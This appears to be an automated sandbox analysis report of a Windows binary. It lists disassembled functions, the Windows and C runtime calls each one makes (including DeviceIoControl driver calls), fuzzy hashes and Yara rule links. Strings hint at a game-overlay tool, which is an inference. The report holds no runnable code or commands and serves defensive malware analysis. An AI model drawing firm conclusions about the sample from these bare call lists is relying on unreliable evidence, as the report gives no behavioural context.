Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memchr$_invalid_parameter_noinfo_noreturn
String ID: Rifl$Shotgun$Snip
API String ID: 876120417-932107277
Opcode ID: cd5e2e956bac97ee5d3d5cf67882bcc3ffbb7adab8e323f04e5c1a482701df14
Instruction ID: a5fc7bcad0cb673b7530d124bef69b6df8810c7c0019da5f1587b4966cc4a6b6
Opcode Fuzzy Hash: cd5e2e956bac97ee5d3d5cf67882bcc3ffbb7adab8e323f04e5c1a482701df14
Instruction Fuzzy Hash: B451A321A18A41C6FA548FA5D4062BD6390FF4CBA0F944239D76D837E9DF7CE54AC701

Function 00007FF68B4B27C0 Relevance: 13.8, APIs: 9, Instructions: 344COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE8F8

Part of subcall function 00007FF68B4C8050: DeviceIoControl.KERNEL32 ref: 00007FF68B4C8109

DeviceIoControl.KERNEL32 ref: 00007FF68B4B2963

Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE998

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B28B1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2ACC
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2B0D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2B5E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2B9E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2BFA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2C77
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2CC3

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ControlDevicememcpy
String ID:
API String ID: 2471032920-0
Opcode ID: 19efa608a734ef2fc86b6138f28007579d95ebd76c5cc6b832ee4b01f031bf47
Instruction ID: 20820ea6ec383d51f0d025adc202fb5a9105d5771b7cecb1e06a3f9718fa2063
Opcode Fuzzy Hash: 19efa608a734ef2fc86b6138f28007579d95ebd76c5cc6b832ee4b01f031bf47
Instruction Fuzzy Hash: 76E1CE62F14A42C5FB00DBA8D4523AD2761FF49BA4F40563ADA6D97AEDDF78E084C340

Function 00007FF68B49EC70 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49ECA8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49ED5C
memcpy.VCRUNTIME140 ref: 00007FF68B49ED7C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49ED9C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EE6A
memcpy.VCRUNTIME140 ref: 00007FF68B49EE81
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EEA8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EEC9

Strings

?, xrefs: 00007FF68B49ECEA

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: freemalloc$memcpy
String ID: ?
API String ID: 3519880569-1684325040
Opcode ID: 0eda81c0c239a8611bac5c0baf279c831adc2644f40de38efdfea289433fc128
Instruction ID: c79df0c079333859e69e1cd6b387bccd35e93e9db4c64e75ff5b729c387842f6
Opcode Fuzzy Hash: 0eda81c0c239a8611bac5c0baf279c831adc2644f40de38efdfea289433fc128
Instruction Fuzzy Hash: DE714A32A05B81C6EB558F25D59127873A4FF58F44F099239CF8D8766AEF38E4A9C300

Function 00007FF68B482840 Relevance: 13.6, APIs: 9, Instructions: 76COMMON

Download Yara Rule

APIs

fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B48288D
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B48289E
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B4828B8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4828DA
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B4828F6
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B482904
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B48291F
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B482927
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B48293D

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: fclose$fseek$freadfreeftellmalloc
String ID:
API String ID: 3246642831-0
Opcode ID: ff4f35db017b39ea0c5163d7132d8126960ede29f49af772f42db7f08a07c73e
Instruction ID: 6ee105dde4d568fc8cb3b645a509d98bd350717cf9e4a4f02351a4fd46aac2de
Opcode Fuzzy Hash: ff4f35db017b39ea0c5163d7132d8126960ede29f49af772f42db7f08a07c73e
Instruction Fuzzy Hash: FC313C21B89A46C1FA558B16A85623922A0FF4DF91F5C6038DD5E837B9EF3CE446C780

Function 00007FF68B49BA00 Relevance: 11.4, APIs: 9, Instructions: 130COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BA31
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BA5A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BA83
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BAB8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BAE1
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BB10
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49BB94
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49BBC7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49BC1C

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 8b64c2be8278b95c9aac7489ece65f10063ef43e940052f4b2b06cd90fb21b61
Instruction ID: 960e800a9aea73da4b180de271164f6a634ba3badb0eca2115650e23524dd861
Opcode Fuzzy Hash: 8b64c2be8278b95c9aac7489ece65f10063ef43e940052f4b2b06cd90fb21b61
Instruction Fuzzy Hash: 15510436A0AB85C6EB558F61E59122833A4FF48F44F184939CE8D87779EF38E894C750

Function 00007FF68B4C6E50 Relevance: 10.7, APIs: 7, Instructions: 178COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B4C6F02

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: fgetc
String ID:
API String ID: 2807381905-0
Opcode ID: 8e3bcec6f41877c3f3658ed6ff0d8a0ed4f6fdf14b624ecb2e1fb391573904be
Instruction ID: f7725d74a54d3eae0ea2823a6eadc1f1b65abc8f2a509af48d9a81b777ee6d16
Opcode Fuzzy Hash: 8e3bcec6f41877c3f3658ed6ff0d8a0ed4f6fdf14b624ecb2e1fb391573904be
Instruction Fuzzy Hash: D4917E32B14A41D9EB508F65C4A13AC3BB4FB48B68F54563ADA5D93BA8DF38D498C340

Function 00007FF68B4923A0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4923EE
memcpy.VCRUNTIME140 ref: 00007FF68B492404
memchr.VCRUNTIME140 ref: 00007FF68B4924A5
memchr.VCRUNTIME140 ref: 00007FF68B4924C1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4925AE

Strings

Window, xrefs: 00007FF68B4924DA
], xrefs: 00007FF68B492482

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memchr$freemallocmemcpy
String ID: Window$]
API String ID: 96147131-2892678728
Opcode ID: 53901d8bd3373084383248c6a7a434a551332a9d99a70775425c7eeec431fad4
Instruction ID: 22cf4ad5d4f54ddee01a17d311ce90f11110a52ae00a0bbe64a4ec9eabab7088
Opcode Fuzzy Hash: 53901d8bd3373084383248c6a7a434a551332a9d99a70775425c7eeec431fad4
Instruction Fuzzy Hash: 32510021B09696C1EB608B1696262BDA791BF4DFE0F484139DE4D877BDDE3CE542C300

Function 00007FF68B4C9A40 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,00007FF68B4B2A37), ref: 00007FF68B4C9AD4
memcpy.VCRUNTIME140(00000000,?,?,00007FF68B4B2A37), ref: 00007FF68B4C9B18
memcpy.VCRUNTIME140(00000000,?,?,00007FF68B4B2A37), ref: 00007FF68B4C9B30
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00007FF68B4B2A37), ref: 00007FF68B4C9BB8
memcpy.VCRUNTIME140(00000000,?,?,00007FF68B4B2A37), ref: 00007FF68B4C9BE5
memcpy.VCRUNTIME140(00000000,?,?,00007FF68B4B2A37), ref: 00007FF68B4C9C00
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C9C23

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 43d9a7e637991d804413b75b8eafd0b546bee4898880e55e751b3496ef96445f
Instruction ID: 684285ba944a41fd142d76405ae31e5612554e41de048e6523e71f9dc72a6176
Opcode Fuzzy Hash: 43d9a7e637991d804413b75b8eafd0b546bee4898880e55e751b3496ef96445f
Instruction Fuzzy Hash: 0851C332A08B81E2EA119F25D1562692360FF18F84F14463ACF6D477A6DF38E1D9C340

Function 00007FF68B4C89A0 Relevance: 10.6, APIs: 7, Instructions: 133COMMON

Download Yara Rule

APIs

?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,00007FF68B4B4B65), ref: 00007FF68B4C8A33
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF68B4B4B65), ref: 00007FF68B4C8A86
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,00007FF68B4B4B65), ref: 00007FF68B4C8AAF
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF68B4B4B65), ref: 00007FF68B4C8AD6
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,00007FF68B4B4B65), ref: 00007FF68B4C8B1C
?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,00007FF68B4B4B65), ref: 00007FF68B4C8B23
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,00007FF68B4B4B65), ref: 00007FF68B4C8B30

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
String ID:
API String ID: 729925803-0
Opcode ID: bcd7a0f69934c32e715cd8f22c3f0a5db7b8064309c69dbff390123b340a6c76
Instruction ID: 519bb63c900fb01522268d7fd094427c125fa9a31c1913ee0dfc4bb29199492e
Opcode Fuzzy Hash: bcd7a0f69934c32e715cd8f22c3f0a5db7b8064309c69dbff390123b340a6c76
Instruction Fuzzy Hash: 4B511132609A41C2EB218F19D5A5239A7A0FF89F95F158639CE5E837B5CF3ED44AC304

Function 00007FF68B4C90B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C90DD
??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C90F7
?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C9129
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C9154
std::_Facet_Register.LIBCPMT ref: 00007FF68B4C916D
??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C918C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C91B7

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
String ID:
API String ID: 762505753-0
Opcode ID: 380a719c7125fa9cec063be90638e52c4b12c2ba82d0ad67ce124ff0566ef5a0
Instruction ID: df2d71b7d88b56a2beaaa428c11accc733aee4bf07affcd6240489400c1a1d43
Opcode Fuzzy Hash: 380a719c7125fa9cec063be90638e52c4b12c2ba82d0ad67ce124ff0566ef5a0
Instruction Fuzzy Hash: C0316B26A08B41D5EA249F11E86617A7360FF8CF94F481639DA9E877B9CF3CE449C700

Function 00007FF68B4C8DD0 Relevance: 9.2, APIs: 6, Instructions: 178COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF68B4C8E98

Part of subcall function 00007FF68B4CAF74: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF68B4C9945,?,?,?,?,?,00007FF68B4C7EB5), ref: 00007FF68B4CAF8E

memset.VCRUNTIME140 ref: 00007FF68B4C8F1D
DeviceIoControl.KERNEL32 ref: 00007FF68B4C8FF8
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C905A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C9095
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C90A1

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmemset$ControlDevice_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 4066468686-0
Opcode ID: af9a489837f2c71f30590f03e3bef5aad726f8ca5ea4237b30f63f64981b9537
Instruction ID: 7df21e5516ef85ecd0859ce1991b8da5223d5ffa1d6a0b73c80a92f4127c83fe
Opcode Fuzzy Hash: af9a489837f2c71f30590f03e3bef5aad726f8ca5ea4237b30f63f64981b9537
Instruction Fuzzy Hash: FF719232A09A85C5EA51DB15E415379A3A0FF88FA0F144739DAAD83BE9DF7CD045C700

Function 00007FF68B492860 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 131stringCOMMON

Download Yara Rule

APIs

strstr.VCRUNTIME140 ref: 00007FF68B4929D7

Strings

Pos=%d,%d, xrefs: 00007FF68B492A01
[%s][%s], xrefs: 00007FF68B4929E1
Size=%d,%d, xrefs: 00007FF68B492A1E
###, xrefs: 00007FF68B4929CD
Collapsed=%d, xrefs: 00007FF68B492A3A

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: strstr
String ID: ###$Collapsed=%d$Pos=%d,%d$Size=%d,%d$[%s][%s]
API String ID: 1392478783-2972057365
Opcode ID: 1e491f211d45ecd41bcd29b71414cce088908a3ffd1bf8d7c3fc79f173c12dcf
Instruction ID: 7ef150a46fecb79f358ff7e2fd9e711c085594b669b24a8dee66cbcb5f748a94
Opcode Fuzzy Hash: 1e491f211d45ecd41bcd29b71414cce088908a3ffd1bf8d7c3fc79f173c12dcf
Instruction Fuzzy Hash: FA519C32A18A86C6EB25CF16E54247CB7A1FF89B84B458139DA9D87378DF3CE441CB00

Function 00007FF68B4C9890 Relevance: 9.1, APIs: 6, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,00007FF68B4C7EB5), ref: 00007FF68B4C997E
memcpy.VCRUNTIME140(?,?,?,?,?,00007FF68B4C7EB5), ref: 00007FF68B4C998C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00007FF68B4C7EB5), ref: 00007FF68B4C99C5
memcpy.VCRUNTIME140(?,?,?,?,?,00007FF68B4C7EB5), ref: 00007FF68B4C99CF
memcpy.VCRUNTIME140(?,?,?,?,?,00007FF68B4C7EB5), ref: 00007FF68B4C99DD
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C9A0F

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 40054f43d045c37fcbcef3706d50dcf0714f2efa37c64624a9c12d944b83fd43
Instruction ID: da12e538652a72a66666429b93f4c54e153b450f0a0e60589f3036dfa8073bd0
Opcode Fuzzy Hash: 40054f43d045c37fcbcef3706d50dcf0714f2efa37c64624a9c12d944b83fd43
Instruction Fuzzy Hash: 0B41D362B08A86D1EF119B16A4263B96361BF0CFD4F544639DE5E477AEDE3CD089C300

Function 00007FF68B4C9F00 Relevance: 9.1, APIs: 6, Instructions: 122COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4C9FEA
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4C9FF9
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4CA02D
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4CA034
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4CA043
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4CA06E

Memory Dump Source

